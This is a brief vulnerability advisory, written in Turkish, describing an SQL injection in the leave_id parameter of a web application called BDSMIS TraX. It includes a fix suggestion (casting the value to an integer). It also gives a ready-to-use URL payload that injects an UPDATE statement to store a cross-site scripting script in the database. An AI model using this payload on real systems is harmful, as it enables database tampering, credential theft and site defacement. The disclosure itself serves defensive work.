< ------------------- header data start ------------------- >

#############################################################

# Application Name : BDSMIS TraX

# Vulnerable Type : SQL Injection

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : leave_id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: leave_id = Cint(Request.QueryString(leave_id))

# author : Bug Researchers


#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/leavesystem/modules/leave_system/GeneralUser/ShowLeave.asp?leave_id=149+update+LEAVE_REQUEST+set+user_id=’><script>alert(sa)</script>’;--

< -- bug code end of -- >